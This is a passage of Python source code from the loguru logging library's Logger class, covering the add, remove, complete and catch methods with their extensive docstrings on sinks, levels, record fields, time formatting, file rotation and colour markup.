state = self.__dict__.copy()
state["lock"] = None
return state
def __setstate__(self, state):
self.__dict__.update(state)
self.lock = create_logger_lock()
class Logger:
"""An object to dispatch logging messages to configured handlers.
The |Logger| is the core object of ``loguru``, every logging configuration and usage pass
through a call to one of its methods. There is only one logger, so there is no need to retrieve
one before usage.
Once the ``logger`` is imported, it can be used to write messages about events happening in your
code. By reading the output logs of your application, you gain a better understanding of the
flow of your program and you more easily track and debug unexpected behaviors.
Handlers to which the logger sends log messages are added using the |add| method. Note that you
can use the |Logger| right after import as it comes pre-configured (logs are emitted to
|sys.stderr| by default). Messages can be logged with different severity levels and using braces
attributes like the |str.format| method do.
When a message is logged, a "record" is associated with it. This record is a dict which contains
information about the logging context: time, function, file, line, thread, level... It also
contains the ``__name__`` of the module, this is why you don't need named loggers.
You should not instantiate a |Logger| by yourself, use ``from loguru import logger`` instead.
"""
def __init__(self, core, exception, depth, record, lazy, colors, raw, capture, patcher, extra):
self._core = core
self._options = (exception, depth, record, lazy, colors, raw, capture, patcher, extra)
def __repr__(self):
return "<loguru.logger handlers=%r>" % list(self._core.handlers.values())
def add(
self,
sink,
*,
level=_defaults.LOGURU_LEVEL,
format=_defaults.LOGURU_FORMAT,
filter=_defaults.LOGURU_FILTER,
colorize=_defaults.LOGURU_COLORIZE,
serialize=_defaults.LOGURU_SERIALIZE,
backtrace=_defaults.LOGURU_BACKTRACE,
diagnose=_defaults.LOGURU_DIAGNOSE,
enqueue=_defaults.LOGURU_ENQUEUE,
catch=_defaults.LOGURU_CATCH,
**kwargs
):
r"""Add a handler sending log messages to a sink adequately configured.
Parameters
----------
sink : |file-like object|_, |str|, |Path|, |callable|_, |coroutine function|_ or |Handler|
An object in charge of receiving formatted logging messages and propagating them to an
appropriate endpoint.
level : |int| or |str|, optional
The minimum severity level from which logged messages should be sent to the sink.
format : |str| or |callable|_, optional
The template used to format logged messages before being sent to the sink.
filter : |callable|_, |str| or |dict|, optional
A directive optionally used to decide for each logged message whether it should be sent
to the sink or not.
colorize : |bool|, optional
Whether the color markups contained in the formatted message should be converted to ansi
codes for terminal coloration, or stripped otherwise. If ``None``, the choice is
automatically made based on the sink being a tty or not.
serialize : |bool|, optional
Whether the logged message and its records should be first converted to a JSON string
before being sent to the sink.
backtrace : |bool|, optional
Whether the exception trace formatted should be extended upward, beyond the catching
point, to show the full stacktrace which generated the error.
diagnose : |bool|, optional
Whether the exception trace should display the variables values to eases the debugging.
This should be set to ``False`` in production to avoid leaking sensitive data.
enqueue : |bool|, optional
Whether the messages to be logged should first pass through a multiprocess-safe queue
before reaching the sink. This is useful while logging to a file through multiple
processes. This also has the advantage of making logging calls non-blocking.
catch : |bool|, optional
Whether errors occurring while sink handles logs messages should be automatically
caught. If ``True``, an exception message is displayed on |sys.stderr| but the exception
is not propagated to the caller, preventing your app to crash.
**kwargs
Additional parameters that are only valid to configure a coroutine or file sink (see
below).
If and only if the sink is a coroutine function, the following parameter applies:
Parameters
----------
loop : |AbstractEventLoop|, optional
The event loop in which the asynchronous logging task will be scheduled and executed. If
``None``, the loop returned by |asyncio.get_event_loop| is used.
If and only if the sink is a file path, the following parameters apply:
Parameters
----------
rotation : |str|, |int|, |time|, |timedelta| or |callable|_, optional
A condition indicating whenever the current logged file should be closed and a new one
started.
retention : |str|, |int|, |timedelta| or |callable|_, optional
A directive filtering old files that should be removed during rotation or end of
program.
compression : |str| or |callable|_, optional
A compression or archive format to which log files should be converted at closure.
delay : |bool|, optional
Whether the file should be created as soon as the sink is configured, or delayed until
first logged message. It defaults to ``False``.
mode : |str|, optional
The opening mode as for built-in |open| function. It defaults to ``"a"`` (open the
file in appending mode).
buffering : |int|, optional
The buffering policy as for built-in |open| function. It defaults to ``1`` (line
buffered file).
encoding : |str|, optional
The file encoding as for built-in |open| function. If ``None``, it defaults to
|locale.getpreferredencoding|.
**kwargs
Others parameters are passed to the built-in |open| function.
Returns
-------
:class:`int`
An identifier associated with the added sink and which should be used to
|remove| it.
Notes
-----
Extended summary follows.
.. _sink:
.. rubric:: The sink parameter
The ``sink`` handles incoming log messages and proceed to their writing somewhere and
somehow. A sink can take many forms:
- A |file-like object|_ like ``sys.stderr`` or ``open("somefile.log", "w")``. Anything with
a ``.write()`` method is considered as a file-like object. Custom handlers may also
implement ``flush()`` (called after each logged message), ``stop()`` (called at sink
termination) and ``complete()`` (awaited by the eponymous method).
- A file path as |str| or |Path|. It can be parametrized with some additional parameters,
see below.
- A |callable|_ (such as a simple function) like ``lambda msg: print(msg)``. This
allows for logging procedure entirely defined by user preferences and needs.
- A asynchronous |coroutine function|_ defined with the ``async def`` statement. The
coroutine object returned by such function will be added to the event loop using
|loop.create_task|. The tasks should be awaited before ending the loop by using
|complete|.
- A built-in |Handler| like ``logging.StreamHandler``. In such a case, the `Loguru` records
are automatically converted to the structure expected by the |logging| module.
Note that the logging functions are not `reentrant`_. This means you should avoid using
the ``logger`` inside any of your sinks or from within |signal| handlers. Otherwise, you
may face deadlock if the module's sink was not explicitly disabled.
.. _message:
.. rubric:: The logged message
The logged message passed to all added sinks is nothing more than a string of the
formatted log, to which a special attribute is associated: the ``.record`` which is a dict
containing all contextual information possibly needed (see below).
Logged messages are formatted according to the ``format`` of the added sink. This format
is usually a string containing braces fields to display attributes from the record dict.
If fine-grained control is needed, the ``format`` can also be a function which takes the
record as parameter and return the format template string. However, note that in such a
case, you should take care of appending the line ending and exception field to the returned
format, while ``"\n{exception}"`` is automatically appended for convenience if ``format`` is
a string.
The ``filter`` attribute can be used to control which messages are effectively passed to the
sink and which one are ignored. A function can be used, accepting the record as an
argument, and returning ``True`` if the message should be logged, ``False`` otherwise. If
a string is used, only the records with the same ``name`` and its children will be allowed.
One can also pass a ``dict`` mapping module names to minimum required level. In such case,
each log record will search for it's closest parent in the ``dict`` and use the associated
level as the filter. The ``dict`` values can be ``int`` severity, ``str`` level name or
``True`` and ``False`` to respectively authorize and discard all module logs
unconditionally. In order to set a default level, the ``""`` module name should be used as
it is the parent of all modules (it does not suppress global ``level`` threshold, though).
Note that while calling a logging method, the keyword arguments (if any) are automatically
added to the ``extra`` dict for convenient contextualization (in addition to being used for
formatting).
.. _levels:
.. rubric:: The severity levels
Each logged message is associated with a severity level. These levels make it possible to
prioritize messages and to choose the verbosity of the logs according to usages. For
example, it allows to display some debugging information to a developer, while hiding it to
the end user running the application.
The ``level`` attribute of every added sink controls the minimum threshold from which log
messages are allowed to be emitted. While using the ``logger``, you are in charge of
configuring the appropriate granularity of your logs. It is possible to add even more custom
levels by using the |level| method.
Here are the standard levels with their default severity value, each one is associated with
a logging method of the same name:
+----------------------+------------------------+------------------------+
| Level name | Severity value | Logger method |
+======================+========================+========================+
| ``TRACE`` | 5 | |logger.trace| |
+----------------------+------------------------+------------------------+
| ``DEBUG`` | 10 | |logger.debug| |
+----------------------+------------------------+------------------------+
| ``INFO`` | 20 | |logger.info| |
+----------------------+------------------------+------------------------+
| ``SUCCESS`` | 25 | |logger.success| |
+----------------------+------------------------+------------------------+
| ``WARNING`` | 30 | |logger.warning| |
+----------------------+------------------------+------------------------+
| ``ERROR`` | 40 | |logger.error| |
+----------------------+------------------------+------------------------+
| ``CRITICAL`` | 50 | |logger.critical| |
+----------------------+------------------------+------------------------+
.. _record:
.. rubric:: The record dict
The record is just a Python dict, accessible from sinks by ``message.record``. It contains
all contextual information of the logging call (time, function, file, line, level, etc.).
Each of its key can be used in the handler's ``format`` so the corresponding value is
properly displayed in the logged message (e.g. ``"{level}"`` -> ``"INFO"``). Some record's
values are objects with two or more attributes, these can be formatted with ``"{key.attr}"``
(``"{key}"`` would display one by default). `Formatting directives`_ like ``"{key: >3}"``
also works and is particularly useful for time (see below).
+------------+---------------------------------+----------------------------+
| Key | Description | Attributes |
+============+=================================+============================+
| elapsed | The time elapsed since the | See |timedelta| |
| | start of the program | |
+------------+---------------------------------+----------------------------+
| exception | The formatted exception if any, | ``type``, ``value``, |
| | ``None`` otherwise | ``traceback`` |
+------------+---------------------------------+----------------------------+
| extra | The dict of attributes | None |
| | bound by the user (see |bind|) | |
+------------+---------------------------------+----------------------------+
| file | The file where the logging call | ``name`` (default), |
| | was made | ``path`` |
+------------+---------------------------------+----------------------------+
| function | The function from which the | None |
| | logging call was made | |
+------------+---------------------------------+----------------------------+
| level | The severity used to log the | ``name`` (default), |
| | message | ``no``, ``icon`` |
+------------+---------------------------------+----------------------------+
| line | The line number in the source | None |
| | code | |
+------------+---------------------------------+----------------------------+
| message | The logged message (not yet | None |
| | formatted) | |
+------------+---------------------------------+----------------------------+
| module | The module where the logging | None |
| | call was made | |
+------------+---------------------------------+----------------------------+
| name | The ``__name__`` where the | None |
| | logging call was made | |
+------------+---------------------------------+----------------------------+
| process | The process in which the | ``name``, ``id`` (default) |
| | logging call was made | |
+------------+---------------------------------+----------------------------+
| thread | The thread in which the | ``name``, ``id`` (default) |
| | logging call was made | |
+------------+---------------------------------+----------------------------+
| time | The aware local time when the | See |datetime| |
| | logging call was made | |
+------------+---------------------------------+----------------------------+
.. _time:
.. rubric:: The time formatting
To use your favorite time representation, you can set it directly in the time formatter
specifier of your handler format, like for example ``format="{time:HH:mm:ss} {message}"``.
Note that this datetime represents your local time, and it is also made timezone-aware,
so you can display the UTC offset to avoid ambiguities.
The time field can be formatted using more human-friendly tokens. These constitute a subset
of the one used by the `Pendulum`_ library of `@sdispater`_. To escape a token, just add
square brackets around it, for example ``"[YY]"`` would display literally ``"YY"``.
If you prefer to display UTC rather than local time, you can add ``"!UTC"`` at the very end
of the time format, like ``{time:HH:mm:ss!UTC}``. Doing so will convert the ``datetime``
to UTC before formatting.
If no time formatter specifier is used, like for example if ``format="{time} {message}"``,
the default one will use ISO 8601.
+------------------------+---------+----------------------------------------+
| | Token | Output |
+========================+=========+========================================+
| Year | YYYY | 2000, 2001, 2002 ... 2012, 2013 |
| +---------+----------------------------------------+
| | YY | 00, 01, 02 ... 12, 13 |
+------------------------+---------+----------------------------------------+
| Quarter | Q | 1 2 3 4 |
+------------------------+---------+----------------------------------------+
| Month | MMMM | January, February, March ... |
| +---------+----------------------------------------+
| | MMM | Jan, Feb, Mar ... |
| +---------+----------------------------------------+
| | MM | 01, 02, 03 ... 11, 12 |
| +---------+----------------------------------------+
| | M | 1, 2, 3 ... 11, 12 |
+------------------------+---------+----------------------------------------+
| Day of Year | DDDD | 001, 002, 003 ... 364, 365 |
| +---------+----------------------------------------+
| | DDD | 1, 2, 3 ... 364, 365 |
+------------------------+---------+----------------------------------------+
| Day of Month | DD | 01, 02, 03 ... 30, 31 |
| +---------+----------------------------------------+
| | D | 1, 2, 3 ... 30, 31 |
+------------------------+---------+----------------------------------------+
| Day of Week | dddd | Monday, Tuesday, Wednesday ... |
| +---------+----------------------------------------+
| | ddd | Mon, Tue, Wed ... |
| +---------+----------------------------------------+
| | d | 0, 1, 2 ... 6 |
+------------------------+---------+----------------------------------------+
| Days of ISO Week | E | 1, 2, 3 ... 7 |
+------------------------+---------+----------------------------------------+
| Hour | HH | 00, 01, 02 ... 23, 24 |
| +---------+----------------------------------------+
| | H | 0, 1, 2 ... 23, 24 |
| +---------+----------------------------------------+
| | hh | 01, 02, 03 ... 11, 12 |
| +---------+----------------------------------------+
| | h | 1, 2, 3 ... 11, 12 |
+------------------------+---------+----------------------------------------+
| Minute | mm | 00, 01, 02 ... 58, 59 |
| +---------+----------------------------------------+
| | m | 0, 1, 2 ... 58, 59 |
+------------------------+---------+----------------------------------------+
| Second | ss | 00, 01, 02 ... 58, 59 |
| +---------+----------------------------------------+
| | s | 0, 1, 2 ... 58, 59 |
+------------------------+---------+----------------------------------------+
| Fractional Second | S | 0 1 ... 8 9 |
| +---------+----------------------------------------+
| | SS | 00, 01, 02 ... 98, 99 |
| +---------+----------------------------------------+
| | SSS | 000 001 ... 998 999 |
| +---------+----------------------------------------+
| | SSSS... | 000[0..] 001[0..] ... 998[0..] 999[0..]|
| +---------+----------------------------------------+
| | SSSSSS | 000000 000001 ... 999998 999999 |
+------------------------+---------+----------------------------------------+
| AM / PM | A | AM, PM |
+------------------------+---------+----------------------------------------+
| Timezone | Z | -07:00, -06:00 ... +06:00, +07:00 |
| +---------+----------------------------------------+
| | ZZ | -0700, -0600 ... +0600, +0700 |
| +---------+----------------------------------------+
| | zz | EST CST ... MST PST |
+------------------------+---------+----------------------------------------+
| Seconds timestamp | X | 1381685817, 1234567890.123 |
+------------------------+---------+----------------------------------------+
| Microseconds timestamp | x | 1234567890123 |
+------------------------+---------+----------------------------------------+
.. _file:
.. rubric:: The file sinks
If the sink is a |str| or a |Path|, the corresponding file will be opened for writing logs.
The path can also contain a special ``"{time}"`` field that will be formatted with the
current date at file creation.
The ``rotation`` check is made before logging each message. If there is already an existing
file with the same name that the file to be created, then the existing file is renamed by
appending the date to its basename to prevent file overwriting. This parameter accepts:
- an |int| which corresponds to the maximum file size in bytes before that the current
logged file is closed and a new one started over.
- a |timedelta| which indicates the frequency of each new rotation.
- a |time| which specifies the hour when the daily rotation should occur.
- a |str| for human-friendly parametrization of one of the previously enumerated types.
Examples: ``"100 MB"``, ``"0.5 GB"``, ``"1 month 2 weeks"``, ``"4 days"``, ``"10h"``,
``"monthly"``, ``"18:00"``, ``"sunday"``, ``"w0"``, ``"monday at 12:00"``, ...
- a |callable|_ which will be invoked before logging. It should accept two arguments: the
logged message and the file object, and it should return ``True`` if the rotation should
happen now, ``False`` otherwise.
The ``retention`` occurs at rotation or at sink stop if rotation is ``None``. Files are
selected if they match the pattern ``"basename(.*).ext(.*)"`` (possible time fields are
beforehand replaced with ``.*``) based on the sink file. This parameter accepts:
- an |int| which indicates the number of log files to keep, while older files are removed.
- a |timedelta| which specifies the maximum age of files to keep.
- a |str| for human-friendly parametrization of the maximum age of files to keep.
Examples: ``"1 week, 3 days"``, ``"2 months"``, ...
- a |callable|_ which will be invoked before the retention process. It should accept the
list of log files as argument and process to whatever it wants (moving files, removing
them, etc.).
The ``compression`` happens at rotation or at sink stop if rotation is ``None``. This
parameter accepts:
- a |str| which corresponds to the compressed or archived file extension. This can be one
of: ``"gz"``, ``"bz2"``, ``"xz"``, ``"lzma"``, ``"tar"``, ``"tar.gz"``, ``"tar.bz2"``,
``"tar.xz"``, ``"zip"``.
- a |callable|_ which will be invoked before file termination. It should accept the path of
the log file as argument and process to whatever it wants (custom compression, network
sending, removing it, etc.).
Either way, if you use a custom function designed according to your preferences, you must be
very careful not to use the ``logger`` within your function. Otherwise, there is a risk that
your program hang because of a deadlock.
.. _color:
.. rubric:: The color markups
To add colors to your logs, you just have to enclose your format string with the appropriate
tags (e.g. ``<red>some message</red>``). These tags are automatically removed if the sink
doesn't support ansi codes. For convenience, you can use ``</>`` to close the last opening
tag without repeating its name (e.g. ``<red>another message</>``).
The special tag ``<level>`` (abbreviated with ``<lvl>``) is transformed according to
the configured color of the logged message level.
Tags which are not recognized will raise an exception during parsing, to inform you about
possible misuse. If you wish to display a markup tag literally, you can escape it by
prepending a ``\`` like for example ``\<blue>``. If, for some reason, you need to escape a
string programmatically, note that the regex used internally to parse markup tags is
``r"\\?</?((?:[fb]g\s)?[^<>\s]*)>"``.
Note that when logging a message with ``opt(colors=True)``, color tags present in the
formatting arguments (``args`` and ``kwargs``) are completely ignored. This is important if
you need to log strings containing markups that might interfere with the color tags (in this
case, do not use f-string).
Here are the available tags (note that compatibility may vary depending on terminal):
+------------------------------------+--------------------------------------+
| Color (abbr) | Styles (abbr) |
+====================================+======================================+
| Black (k) | Bold (b) |
+------------------------------------+--------------------------------------+
| Blue (e) | Dim (d) |
+------------------------------------+--------------------------------------+
| Cyan (c) | Normal (n) |
+------------------------------------+--------------------------------------+
| Green (g) | Italic (i) |
+------------------------------------+--------------------------------------+
| Magenta (m) | Underline (u) |
+------------------------------------+--------------------------------------+
| Red (r) | Strike (s) |
+------------------------------------+--------------------------------------+
| White (w) | Reverse (v) |
+------------------------------------+--------------------------------------+
| Yellow (y) | Blink (l) |
+------------------------------------+--------------------------------------+
| | Hide (h) |
+------------------------------------+--------------------------------------+
Usage:
+-----------------+-------------------------------------------------------------------+
| Description | Examples |
| +---------------------------------+---------------------------------+
| | Foreground | Background |
+=================+=================================+=================================+
| Basic colors | ``<red>``, ``<r>`` | ``<GREEN>``, ``<G>`` |
+-----------------+---------------------------------+---------------------------------+
| Light colors | ``<light-blue>``, ``<le>`` | ``<LIGHT-CYAN>``, ``<LC>`` |
+-----------------+---------------------------------+---------------------------------+
| 8-bit colors | ``<fg 86>``, ``<fg 255>`` | ``<bg 42>``, ``<bg 9>`` |
+-----------------+---------------------------------+---------------------------------+
| Hex colors | ``<fg #00005f>``, ``<fg #EE1>`` | ``<bg #AF5FD7>``, ``<bg #fff>`` |
+-----------------+---------------------------------+---------------------------------+
| RGB colors | ``<fg 0,95,0>`` | ``<bg 72,119,65>`` |
+-----------------+---------------------------------+---------------------------------+
| Stylizing | ``<bold>``, ``<b>``, ``<underline>``, ``<u>`` |
+-----------------+-------------------------------------------------------------------+
.. _env:
.. rubric:: The environment variables
The default values of sink parameters can be entirely customized. This is particularly
useful if you don't like the log format of the pre-configured sink.
Each of the |add| default parameter can be modified by setting the ``LOGURU_[PARAM]``
environment variable. For example on Linux: ``export LOGURU_FORMAT="{time} - {message}"``
or ``export LOGURU_DIAGNOSE=NO``.
The default levels' attributes can also be modified by setting the ``LOGURU_[LEVEL]_[ATTR]``
environment variable. For example, on Windows: ``setx LOGURU_DEBUG_COLOR "<blue>"``
or ``setx LOGURU_TRACE_ICON "🚀"``. If you use the ``set`` command, do not include quotes
but escape special symbol as needed, e.g. ``set LOGURU_DEBUG_COLOR=^<blue^>``.
If you want to disable the pre-configured sink, you can set the ``LOGURU_AUTOINIT``
variable to ``False``.
On Linux, you will probably need to edit the ``~/.profile`` file to make this persistent. On
Windows, don't forget to restart your terminal for the change to be taken into account.
Examples
--------
>>> logger.add(sys.stdout, format="{time} - {level} - {message}", filter="sub.module")
>>> logger.add("file_{time}.log", level="TRACE", rotation="100 MB")
>>> def debug_only(record):
... return record["level"].name == "DEBUG"
...
>>> logger.add("debug.log", filter=debug_only) # Other levels are filtered out
>>> def my_sink(message):
... record = message.record
... update_db(message, time=record["time"], level=record["level"])
...
>>> logger.add(my_sink)
>>> level_per_module = {
... "": "DEBUG",
... "third.lib": "WARNING",
... "anotherlib": False
... }
>>> logger.add(lambda m: print(m, end=""), filter=level_per_module, level=0)
>>> async def publish(message):
... await api.post(message)
...
>>> logger.add(publish, serialize=True)
>>> from logging import StreamHandler
>>> logger.add(StreamHandler(sys.stderr), format="{message}")
>>> class RandomStream:
... def __init__(self, seed, threshold):
... self.threshold = threshold
... random.seed(seed)
... def write(self, message):
... if random.random() > self.threshold:
... print(message)
...
>>> stream_object = RandomStream(seed=12345, threshold=0.25)
>>> logger.add(stream_object, level="INFO")
"""
with self._core.lock:
handler_id = next(self._core.handlers_count)
error_interceptor = ErrorInterceptor(catch, handler_id)
if colorize is None and serialize:
colorize = False
if isinstance(sink, (str, PathLike)):
path = sink
name = "'%s'" % path
if colorize is None:
colorize = False
wrapped_sink = FileSink(path, **kwargs)
kwargs = {}
encoding = wrapped_sink.encoding
terminator = "\n"
exception_prefix = ""
elif hasattr(sink, "write") and callable(sink.write):
name = getattr(sink, "name", None) or repr(sink)
if colorize is None:
colorize = _colorama.should_colorize(sink)
if colorize is True and _colorama.should_wrap(sink):
stream = _colorama.wrap(sink)
else:
stream = sink
wrapped_sink = StreamSink(stream)
encoding = getattr(sink, "encoding", None)
terminator = "\n"
exception_prefix = ""
elif isinstance(sink, logging.Handler):
name = repr(sink)
if colorize is None:
colorize = False
wrapped_sink = StandardSink(sink)
encoding = getattr(sink, "encoding", None)
terminator = ""
exception_prefix = "\n"
elif iscoroutinefunction(sink) or iscoroutinefunction(getattr(sink, "__call__", None)):
name = getattr(sink, "__name__", None) or repr(sink)
if colorize is None:
colorize = False
loop = kwargs.pop("loop", None)
# The worker thread needs an event loop, it can't create a new one internally because it
# has to be accessible by the user while calling "complete()", instead we use the global
# one when the sink is added. If "enqueue=False" the event loop is dynamically retrieved
# at each logging call, which is much more convenient. However, coroutine can't access
# running loop in Python 3.5.2 and earlier versions, see python/asyncio#452.
if enqueue and loop is None:
loop = asyncio.get_event_loop()
coro = sink if iscoroutinefunction(sink) else sink.__call__
wrapped_sink = AsyncSink(coro, loop, error_interceptor)
encoding = "utf8"
terminator = "\n"
exception_prefix = ""
elif callable(sink):
name = getattr(sink, "__name__", None) or repr(sink)
if colorize is None:
colorize = False
wrapped_sink = CallableSink(sink)
encoding = "utf8"
terminator = "\n"
exception_prefix = ""
else:
raise TypeError("Cannot log to objects of type '%s'" % type(sink).__name__)
if kwargs:
raise TypeError("add() got an unexpected keyword argument '%s'" % next(iter(kwargs)))
if filter is None:
filter_func = None
elif filter == "":
filter_func = _filters.filter_none
elif isinstance(filter, str):
parent = filter + "."
length = len(parent)
filter_func = functools.partial(_filters.filter_by_name, parent=parent, length=length)
elif isinstance(filter, dict):
level_per_module = {}
for module, level_ in filter.items():
if module is not None and not isinstance(module, str):
raise TypeError(
"The filter dict contains an invalid module, "
"it should be a string (or None), not: '%s'" % type(module).__name__
)
if level_ is False:
levelno_ = False
elif level_ is True:
levelno_ = 0
elif isinstance(level_, str):
try:
levelno_ = self.level(level_).no
except ValueError:
raise ValueError(
"The filter dict contains a module '%s' associated to a level name "
"which does not exist: '%s'" % (module, level_)
)
elif isinstance(level_, int):
levelno_ = level_
else:
raise TypeError(
"The filter dict contains a module '%s' associated to an invalid level, "
"it should be an integer, a string or a boolean, not: '%s'"
% (module, type(level_).__name__)
)
if levelno_ < 0:
raise ValueError(
"The filter dict contains a module '%s' associated to an invalid level, "
"it should be a positive integer, not: '%d'" % (module, levelno_)
)
level_per_module[module] = levelno_
filter_func = functools.partial(
_filters.filter_by_level, level_per_module=level_per_module
)
elif callable(filter):
if filter == builtins.filter:
raise ValueError(
"The built-in 'filter()' function cannot be used as a 'filter' parameter, "
"this is most likely a mistake (please double-check the arguments passed "
"to 'logger.add()')."
)
filter_func = filter
else:
raise TypeError(
"Invalid filter, it should be a function, a string or a dict, not: '%s'"
% type(filter).__name__
)
if isinstance(level, str):
levelno = self.level(level).no
elif isinstance(level, int):
levelno = level
else:
raise TypeError(
"Invalid level, it should be an integer or a string, not: '%s'"
% type(level).__name__
)
if levelno < 0:
raise ValueError(
"Invalid level value, it should be a positive integer, not: %d" % levelno
)
if isinstance(format, str):
try:
formatter = Colorizer.prepare_format(format + terminator + "{exception}")
except ValueError as e:
raise ValueError(
"Invalid format, color markups could not be parsed correctly"
) from e
is_formatter_dynamic = False
elif callable(format):
if format == builtins.format:
raise ValueError(
"The built-in 'format()' function cannot be used as a 'format' parameter, "
"this is most likely a mistake (please double-check the arguments passed "
"to 'logger.add()')."
)
formatter = format
is_formatter_dynamic = True
else:
raise TypeError(
"Invalid format, it should be a string or a function, not: '%s'"
% type(format).__name__
)
if not isinstance(encoding, str):
encoding = "ascii"
with self._core.lock:
exception_formatter = ExceptionFormatter(
colorize=colorize,
encoding=encoding,
diagnose=diagnose,
backtrace=backtrace,
hidden_frames_filename=self.catch.__code__.co_filename,
prefix=exception_prefix,
)
handler = Handler(
name=name,
sink=wrapped_sink,
levelno=levelno,
formatter=formatter,
is_formatter_dynamic=is_formatter_dynamic,
filter_=filter_func,
colorize=colorize,
serialize=serialize,
enqueue=enqueue,
id_=handler_id,
error_interceptor=error_interceptor,
exception_formatter=exception_formatter,
levels_ansi_codes=self._core.levels_ansi_codes,
)
handlers = self._core.handlers.copy()
handlers[handler_id] = handler
self._core.min_level = min(self._core.min_level, levelno)
self._core.handlers = handlers
return handler_id
def remove(self, handler_id=None):
"""Remove a previously added handler and stop sending logs to its sink.
Parameters
----------
handler_id : |int| or ``None``
The id of the sink to remove, as it was returned by the |add| method. If ``None``, all
handlers are removed. The pre-configured handler is guaranteed to have the index ``0``.
Raises
------
ValueError
If ``handler_id`` is not ``None`` but there is no active handler with such id.
Examples
--------
>>> i = logger.add(sys.stderr, format="{message}")
>>> logger.info("Logging")
Logging
>>> logger.remove(i)
>>> logger.info("No longer logging")
"""
if not (handler_id is None or isinstance(handler_id, int)):
raise TypeError(
"Invalid handler id, it should be an integer as returned "
"by the 'add()' method (or None), not: '%s'" % type(handler_id).__name__
)
with self._core.lock:
handlers = self._core.handlers.copy()
if handler_id is not None and handler_id not in handlers:
raise ValueError("There is no existing handler with id %d" % handler_id) from None
if handler_id is None:
handler_ids = list(handlers.keys())
else:
handler_ids = [handler_id]
for handler_id in handler_ids:
handler = handlers.pop(handler_id)
# This needs to be done first in case "stop()" raises an exception
levelnos = (h.levelno for h in handlers.values())
self._core.min_level = min(levelnos, default=float("inf"))
self._core.handlers = handlers
handler.stop()
def complete(self):
"""Wait for the end of enqueued messages and asynchronous tasks scheduled by handlers.
This method proceeds in two steps: first it waits for all logging messages added to handlers
with ``enqueue=True`` to be processed, then it returns an object that can be awaited to
finalize all logging tasks added to the event loop by coroutine sinks.
It can be called from non-asynchronous code. This is especially recommended when the
``logger`` is utilized with ``multiprocessing`` to ensure messages put to the internal
queue have been properly transmitted before leaving a child process.
The returned object should be awaited before the end of a coroutine executed by
|asyncio.run| or |loop.run_until_complete| to ensure all asynchronous logging messages are
processed. The function |asyncio.get_event_loop| is called beforehand, only tasks scheduled
in the same loop that the current one will be awaited by the method.
Returns
-------
:term:`awaitable`
An awaitable object which ensures all asynchronous logging calls are completed when
awaited.
Examples
--------
>>> async def sink(message):
... await asyncio.sleep(0.1) # IO processing...
... print(message, end="")
...
>>> async def work():
... logger.info("Start")
... logger.info("End")
... await logger.complete()
...
>>> logger.add(sink)
1
>>> asyncio.run(work())
Start
End
>>> def process():
... logger.info("Message sent from the child")
... logger.complete()
...
>>> logger.add(sys.stderr, enqueue=True)
1
>>> process = multiprocessing.Process(target=process)
>>> process.start()
>>> process.join()
Message sent from the child
"""
with self._core.lock:
handlers = self._core.handlers.copy()
for handler in handlers.values():
handler.complete_queue()
class AwaitableCompleter:
def __await__(self_):
with self._core.lock:
handlers = self._core.handlers.copy()
for handler in handlers.values():
yield from handler.complete_async().__await__()
return AwaitableCompleter()
def catch(
self,
exception=Exception,
*,
level="ERROR",
reraise=False,
onerror=None,
exclude=None,
default=None,
message="An error has been caught in function '{record[function]}', "
"process '{record[process].name}' ({record[process].id}), "
"thread '{record[thread].name}' ({record[thread].id}):"
):
"""Return a decorator to automatically log possibly caught error in wrapped function.
This is useful to ensure unexpected exceptions are logged, the entire program can be
wrapped by this method. This is also very useful to decorate |Thread.run| methods while
using threads to propagate errors to the main logger thread.
Note that the visibility of variables values (which uses the great |better_exceptions|_
library from `@Qix-`_) depends on the ``diagnose`` option of each configured sink.
The returned object can also be used as a context manager.
Parameters
----------
exception : |Exception|, optional
The type of exception to intercept. If several types should be caught, a tuple of
exceptions can be used too.
level : |str| or |int|, optional
The level name or severity with which the message should be logged.
reraise : |bool|, optional
Whether the exception should be raised again and hence propagated to the caller.
onerror : |callable|_, optional
A function that will be called if an error occurs, once the message has been logged.
It should accept the exception instance as it sole argument.
exclude : |Exception|, optional
A type of exception (or a tuple of types) that will be purposely ignored and hence
propagated to the caller without being logged.
default : optional
The value to be returned by the decorated function if an error occurred without being
re-raised.
message : |str|, optional
The message that will be automatically logged if an exception occurs. Note that it will
be formatted with the ``record`` attribute.
Returns
-------
:term:`decorator` / :term:`context manager`
An object that can be used to decorate a function or as a context manager to log
exceptions possibly caught.
Examples
--------
>>> @logger.catch
... def f(x):
... 100 / x
...
>>> def g():
... f(10)
... f(0)
...
>>> g()
ERROR - An error has been caught in function 'g', process 'Main' (367), thread 'ch1' (1398):
Traceback (most recent call last):
File "program.py", line 12, in <module>
g()
└ <function g at 0x7f225fe2bc80>
> File "program.py", line 10, in g
f(0)
└ <function f at 0x7f225fe2b9d8>
File "program.py", line 6, in f
100 / x
└ 0
ZeroDivisionError: division by zero
>>> with logger.catch(message="Because we never know..."):
... main() # No exception, no logs
>>> # Use 'onerror' to prevent the program exit code to be 0 (if 'reraise=False') while
>>> # also avoiding the stacktrace to be duplicated on stderr (if 'reraise=True').
>>> @logger.catch(onerror=lambda _: sys.exit(1))
... def main():
... 1 / 0
"""
if callable(exception) and (
not isclass(exception) or not issubclass(exception, BaseException)
):
return self.catch()(exception)
class Catcher:
def __init__(self_, from_decorator):
self_._from_decorator = from_decorator
def __enter__(self_):
return None
def __exit__(self_, type_, value, traceback_):
if type_ is None:
return
if not issubclass(type_, exception):
return False
if exclude is not None and issubclass(type_, exclude):
return False
from_decorator = self_._from_decorator
_, depth, _, *options = self._options
if from_decorator:
depth += 1
catch_options = [(type_, value, traceback_), depth, True] + options
level_id, static_level_no = self._dynamic_level(level)
self._log(level_id, static_level_no, from_decorator, catch_options, message, (), {})
if onerror is not None:
onerror(value)
return not reraise
def __call__(_, function):
catcher = Catcher(True)
if iscoroutinefunction(function):
async def catch_wrapper(*args, **kwargs):
with catcher:
return await function(*args, **kwargs)
return default
elif isgeneratorfunction(function):
def catch_wrapper(*args, **kwargs):
with catcher:
return (yield from function(*args, **kwargs))
return default
else:
def catch_wrapper(*args, **kwargs):
with catcher:
return function(*args, **kwargs)
return default
functools.update_wrapper(catch_wrapper, function)
return catch_wrapper
return Catcher(False)
def opt(
self,
*,
exception=None,
record=False,
lazy=False,
colors=False,
raw=False,
capture=True,
depth=0,
ansi=False
):
r"""Parametrize a logging call to slightly change generated log message.
Note that it's not possible to chain |opt| calls, the last one takes precedence over the
others as it will "reset" the options to their default values.
Parameters
----------
exception : |bool|, |tuple| or |Exception|, optional
If it does not evaluate as ``False``, the passed exception is formatted and added to the
